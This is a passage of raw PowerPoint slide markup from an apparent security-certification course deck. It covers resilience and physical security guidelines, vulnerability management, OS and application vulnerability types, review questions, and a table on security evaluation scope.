            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Use NIC teaming, multiple paths, and load balancing to make networks resilient.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Use RAID and multipath I/O to make storage resilient.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Implement diversity in technologies and controls.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Perform comprehensive testing of resiliency capabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Follow these guidelines for deploying or upgrading physical security controls:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>If possible, design sites as zones to maximize access controls and surveillance for the most secure areas, using industrial camouflage, perimeter network, air gaps, vaults, and safes where applicable.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Secure the site perimeter and access points using fencing, barricades/bollards, and locks (physical, electronic, and biometric). If using smart cards, use a type that is resistant to cloning/skimming.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Monitor the site using security guards, CCTV, and drones/UAV, and use effective lighting to maximize surveillance.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Deploy an alarm system (circuit, motion-based, proximity, and/or duress) to detect intrusion.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Use ID badges to authorize access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257497274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2FF36-6DD4-3534-A1BC-EE965D85C4E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 8 - Explain Vulnerability Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA505B04-AB62-0106-13D1-E60563878DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this lesson, you will do the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe the importance of vulnerability management.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain security concerns associated with general and application-specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summarize vulnerability scanning techniques.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain vulnerability analysis concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17063689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1EF88-7877-6B68-8C2B-111B53D1F034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 8A - Device and OS Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD20098-C669-A5AB-9E03-396EAE91FAFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="9163352" cy="4697411"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating systems, including mobile operating systems, are a common target for cyberattacks. Managing vulnerabilities in these systems plays a central role in cybersecurity operations. Vulnerabilities are introduced from various sources, such as flaws in the operating system’s design, errors in its code, or insecure default settings. Attackers can exploit these vulnerabilities to gain unauthorized access, disrupt operations, or steal sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Operating System Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Example OS Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>macOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Android</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226632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D418-471C-3C3C-6A3D-694B1C67D37C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Vulnerability Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1E35ED9-C1C1-D0EA-828F-9B86ABAF3536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Legacy and End-of-Life (EOL) Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Firmware Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Virtualization Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Zero-Day Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Misconfiguration Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cryptographic Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210255600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F3825-7594-496C-5F41-E460A0E6D804}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Sideloading, Rooting, and Jailbreaking</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9449A81B-F71E-0BD6-DDF5-B2E289317F18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160588"/>
            <a:ext cx="5142895" cy="4559525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mobile devices introduce unique security vulnerabilities related to their operation, specialized software, ubiquity, and ability to store and collect vast amounts of personal and professional data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rooting and jailbreaking are methods used to gain elevated privileges and access to system files on mobile devices. This allows users to bypass certain restrictions imposed by the device manufacturer or operating system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rooting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jailbreaking</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 581">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F45C0D5-FA52-0AF3-D486-478A1546C203}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6371774" y="1553030"/>
            <a:ext cx="3566470" cy="5021942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92233636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C419-E75A-CAE2-9BCF-3D0283373CC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Device and OS Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8435ECFA-7413-BA22-ECD5-8CCD1E9E78FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8960152" cy="4697411"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are recommending that a business owner invest in patch management controls for its PCs and laptops. What is the main risk from weak patch management procedures on such devices?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are advising a business owner on security for a PC running Windows 7. The PC runs process management software that the owner cannot run on Windows 11. What are the risks arising from this, and how can they be mitigated?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a security solution provider, you are compiling a checklist for your customers to assess potential vulnerabilities. What vulnerability do the following items relate to? Default settings, Unsecured root accounts, Open ports and services, Unsecure protocols, Weak encryption, Errors.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257675906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84BE2-3255-C433-ADDF-9512B0DC583C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 8B - Application and Cloud Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064F9094-3241-68A9-7785-096347F4CDE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Application Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Race Condition and TOCTOU (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>time-of-check to time-of- use)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Memory Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious Update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 598">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB2B7AF3-F0A6-3247-9982-98054D2A803C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5666920" y="2336873"/>
            <a:ext cx="5712279" cy="3410919"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3741977320"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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48075-055B-03E0-9D89-415D372CD406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413621" y="12700"/>
            <a:ext cx="9613861" cy="1080938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Evaluation Scope</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0753BD55-D2AF-BAD3-C166-CA0E254676B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4134108360"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228601" y="1093638"/>
          <a:ext cx="11810999" cy="5156200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2152650">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2642302910"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="9658349">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1937576767"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>TOE Practice</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1535748154"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Security Testing</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Conducting vulnerability assessments and penetration testing to identify potential weaknesses, vulnerabilities, or misconfigurations.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2854591078"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Documentation Review</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                          <a:solidFill>
